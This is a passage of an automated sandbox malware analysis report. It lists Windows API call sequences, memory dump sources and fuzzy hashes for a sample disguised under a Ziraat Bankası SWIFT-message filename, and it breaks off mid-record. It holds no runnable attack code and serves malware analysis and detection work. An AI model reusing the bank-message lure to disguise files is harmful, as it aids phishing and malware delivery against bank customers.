                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3137044355-0
                                                                                                                                                        • Opcode ID: af22a3388adef6f0c77328b917bde2629f98b402e75ac73441f382539f4526be
                                                                                                                                                        • Instruction ID: 6b34434a556fc9cf7a65462224bd39192c8bc45848c583a316d04b023395c14f
                                                                                                                                                        • Opcode Fuzzy Hash: af22a3388adef6f0c77328b917bde2629f98b402e75ac73441f382539f4526be
                                                                                                                                                        • Instruction Fuzzy Hash: C7216771900209EBDB20CF91EC88FDEBBB8EF40700F00846EE556A6450DBB0EA55DF60
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 000C6733
                                                                                                                                                        • _memset.LIBCMT ref: 000C6754
                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 000C67A6
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 000C67AF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1157408455-0
                                                                                                                                                        • Opcode ID: 01a4be2b58a354225dd47af4569ec5760600e1e02fcda564f846d573376c2dfb
                                                                                                                                                        • Instruction ID: 018f8074e3924b6ba1fb5163c439cafd89242d2ddad3329375d1173524c3b99d
                                                                                                                                                        • Opcode Fuzzy Hash: 01a4be2b58a354225dd47af4569ec5760600e1e02fcda564f846d573376c2dfb
                                                                                                                                                        • Instruction Fuzzy Hash: D7110A729012287AE73057A5AC4DFEFBABCEF44724F10469AF504E71C0D6744E808B64
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 000BB498
                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BB4AA
                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BB4C0
                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BB4DB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                        • Opcode ID: 98382f0df5f37edd1fd2c52a6f98e6e664e64999220217809f8d050c8387e6da
                                                                                                                                                        • Instruction ID: 7b9f518c753e216d7114a0ac3b71b001b0364ba0c2701dc80868a05fa0b74468
                                                                                                                                                        • Opcode Fuzzy Hash: 98382f0df5f37edd1fd2c52a6f98e6e664e64999220217809f8d050c8387e6da
                                                                                                                                                        • Instruction Fuzzy Hash: 84112A7A900218FFDB11DFA9C985EDDBBB4FB08710F204091E604B7295D7B1AE11DB94
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F
                                                                                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0009B5A5
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 000FE69A
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 000FE6A4
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 000FE6AF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4127811313-0
                                                                                                                                                        • Opcode ID: 71042d1e8ddbaed61a73724b2493b242753ef756a91003e86bf55a5bd09adbea
                                                                                                                                                        • Instruction ID: c5fc556795cf519424fde752c274fc25dee5a4a95c7670da0935105dc435f83d
                                                                                                                                                        • Opcode Fuzzy Hash: 71042d1e8ddbaed61a73724b2493b242753ef756a91003e86bf55a5bd09adbea
                                                                                                                                                        • Instruction Fuzzy Hash: AD11333190002AFFCF10EF98EE85AEE7BB9EF09314F410451E942E7551D770AA81EBA1
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 000C7352
                                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 000C7385
                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 000C739B
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000C73A2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2880819207-0
                                                                                                                                                        • Opcode ID: f3a96ae1b0c31181abf261363a255323f6a8835bd200f84bc1d2dc175f5cf3e5
                                                                                                                                                        • Instruction ID: 82b27ac1f9c87a6fbf476b257dc9f73f3e31b9ca2884ff50ef6bd6d1c2e7d2ad
                                                                                                                                                        • Opcode Fuzzy Hash: f3a96ae1b0c31181abf261363a255323f6a8835bd200f84bc1d2dc175f5cf3e5
                                                                                                                                                        • Instruction Fuzzy Hash: E211C476A04254BFC7019BACEC09F9E7BEDAB45324F144359FD25D32A1D6B08E409BA1
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009D1BA
                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 0009D1CE
                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0009D1D8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3970641297-0
                                                                                                                                                        • Opcode ID: 67a4956176500e2f3d4e730464731900936344d4a9dfc0763306d3d6d78580c0
                                                                                                                                                        • Instruction ID: 1a57d3b775fde840b6951b1838483dc887ab79f88c8c3ab18f7fad724f4e4385
                                                                                                                                                        • Opcode Fuzzy Hash: 67a4956176500e2f3d4e730464731900936344d4a9dfc0763306d3d6d78580c0
                                                                                                                                                        • Instruction Fuzzy Hash: 7411CC73141509BFEF124FA0EC50EEABBAAFF09368F050112FA1552060D772DCA0EBA0
                                                                                                                                                        APIs
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 000C3FB8
                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 000C3FDD
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 000C3FE7
                                                                                                                                                        • Sleep.KERNEL32(?), ref: 000C401A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2875609808-0
                                                                                                                                                        • Opcode ID: 1d512290fa340eb113fb38fb2c7aac70813dc283791ccab19988bfa27243084f
                                                                                                                                                        • Instruction ID: 7664a6919db4ae687f3ec2ec7ca885edd8de1b46a01ac9d61cd3de8e3cf4678f
                                                                                                                                                        • Opcode Fuzzy Hash: 1d512290fa340eb113fb38fb2c7aac70813dc283791ccab19988bfa27243084f
                                                                                                                                                        • Instruction Fuzzy Hash: DD115E31D0061DEBCF109FE4E849BEEBB74FF08701F114059EA41B6180CB7096A1DB95
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                        • Instruction ID: 7bb8b4582bb3022b83f95c9a52ad47b4d9919ca7b61c2469c987b74df4de781b
                                                                                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                        • Instruction Fuzzy Hash: F701493200014EBBCF625E84DC118EE3F67BB18355B588455FE2859132D336DAB2AB81
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000A7A0D: __getptd_noexit.LIBCMT ref: 000A7A0E
                                                                                                                                                        • __lock.LIBCMT ref: 000A748F
                                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 000A74AC
                                                                                                                                                        • _free.LIBCMT ref: 000A74BF
                                                                                                                                                        • InterlockedIncrement.KERNEL32(00CF2AD8), ref: 000A74D7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2704283638-0
                                                                                                                                                        • Opcode ID: 50ffad5a3339baef60f7cd39cad712919c6437ce426785caad650b0b8af7cb0b
                                                                                                                                                        • Instruction ID: 5050acd2dc11e74cf73e566addffabf4162994699b7767fe62e8fa116033a057
                                                                                                                                                        • Opcode Fuzzy Hash: 50ffad5a3339baef60f7cd39cad712919c6437ce426785caad650b0b8af7cb0b
                                                                                                                                                        • Instruction Fuzzy Hash: 3701843190AA11ABC762AFE4AD057DDBBA0BF0A721F15C019F458A7A91CB245981CFD2
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 000EDFF7
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 000EE00F
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 000EE033
                                                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 000EE04E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 357397906-0
                                                                                                                                                        • Opcode ID: 4630f4b90108b3a6f14d8f64f0587f06ab78dccf626d59711d4cb17ec800b524
                                                                                                                                                        • Instruction ID: 5dd5561230bacbac722dd3ebcf003e2f52e9f17a0534599f171541d5022318c0
                                                                                                                                                        • Opcode Fuzzy Hash: 4630f4b90108b3a6f14d8f64f0587f06ab78dccf626d59711d4cb17ec800b524
                                                                                                                                                        • Instruction Fuzzy Hash: 1A1150B9D00209EFDB41CF98D8849EEBBF9FB08310F108166E965E3210D775AA94CF50
                                                                                                                                                        APIs
                                                                                                                                                        • __lock.LIBCMT ref: 000A7AD8
                                                                                                                                                          • Part of subcall function 000A7CF4: __mtinitlocknum.LIBCMT ref: 000A7D06
                                                                                                                                                          • Part of subcall function 000A7CF4: EnterCriticalSection.KERNEL32(00000000,?,000A7ADD,0000000D), ref: 000A7D1F
                                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 000A7AE5
                                                                                                                                                        • __lock.LIBCMT ref: 000A7AF9
                                                                                                                                                        • ___addlocaleref.LIBCMT ref: 000A7B17
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1687444384-0
                                                                                                                                                        • Opcode ID: f6b45025ca1f9af31786b88e37e63f3e624b3eab3419486549fe0ef88a2814e0
                                                                                                                                                        • Instruction ID: d226e0a8344ecea1950f922cc8945185fd28c62e4296d3b661afcc23929bc686
                                                                                                                                                        • Opcode Fuzzy Hash: f6b45025ca1f9af31786b88e37e63f3e624b3eab3419486549fe0ef88a2814e0
                                                                                                                                                        • Instruction Fuzzy Hash: ED016DB1504B00DFD720DFB5D90678AB7F0EF51321F20890EE4DA976A1CBB0A680CB11
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 000EE33D
                                                                                                                                                        • _memset.LIBCMT ref: 000EE34C
                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00143D00,00143D44), ref: 000EE37B
                                                                                                                                                        • CloseHandle.KERNEL32 ref: 000EE38D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3277943733-0
                                                                                                                                                        • Opcode ID: 78e725b1ff1e4183c52d696f9f623c8e684496102e446e595e39fd9dc60dccdc
                                                                                                                                                        • Instruction ID: 4d97b3e9619af68e21c468a36f0c86b16ff1ed7a3a4d0ad1ab6549d6fafe29d9
                                                                                                                                                        • Opcode Fuzzy Hash: 78e725b1ff1e4183c52d696f9f623c8e684496102e446e595e39fd9dc60dccdc
                                                                                                                                                        • Instruction Fuzzy Hash: 52F082F5940308BEE3101BE5AC45FB77E6CDB06758F404431FE18EA5B2D3B59E4086A8
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009AFE3
                                                                                                                                                          • Part of subcall function 0009AF83: SelectObject.GDI32(?,00000000), ref: 0009AFF2
                                                                                                                                                          • Part of subcall function 0009AF83: BeginPath.GDI32(?), ref: 0009B009
                                                                                                                                                          • Part of subcall function 0009AF83: SelectObject.GDI32(?,00000000), ref: 0009B033
                                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000EEA8E
                                                                                                                                                        • LineTo.GDI32(00000000,?,?), ref: 000EEA9B
                                                                                                                                                        • EndPath.GDI32(00000000), ref: 000EEAAB
                                                                                                                                                        • StrokePath.GDI32(00000000), ref: 000EEAB9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                                        • Opcode ID: 40930aa2e6b393887ff8781cbf92feeb805678392d8b4485678b7bf624d1bc45
                                                                                                                                                        • Instruction ID: 830c46213fcb8364069e57fc9276ac290bfdc726ce5f899a9c1ae9c797339746
                                                                                                                                                        • Opcode Fuzzy Hash: 40930aa2e6b393887ff8781cbf92feeb805678392d8b4485678b7bf624d1bc45
                                                                                                                                                        • Instruction Fuzzy Hash: 92F05E31005299BBDB12AF94EC09FCE3F59AF06321F184101FE55614E187B49591DBD6
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000BC84A
                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 000BC85D
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 000BC864
                                                                                                                                                        • AttachThreadInput.USER32(00000000), ref: 000BC86B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                                        • Opcode ID: 0790ef8c7443e611b840124037f01e7b80086aad756bb61fb719b41fda928151
                                                                                                                                                        • Instruction ID: 519c789ec65ae6664d044c1658014b838466172fe630b3ebac4e20b3f173530d
                                                                                                                                                        • Opcode Fuzzy Hash: 0790ef8c7443e611b840124037f01e7b80086aad756bb61fb719b41fda928151
                                                                                                                                                        • Instruction Fuzzy Hash: 4AE0E57154122476EB215FA1EC0DEDB7F5CEF157A1F408015B54D95850CAB2C5C1D7E0
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 000BB0D6
                                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000), ref: 000BB0DD
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 000BB0EA
                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 000BB0F1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3974789173-0
                                                                                                                                                        • Opcode ID: f0c12c12ff77a043cc68fd73506625bca6313bbfc0033dd6d0f02a58ef51a964
                                                                                                                                                        • Instruction ID: c4566efed9e5ce05d03e4fe96a8e0932ff37802a0000fc62b8d0b38ab3df5c0f
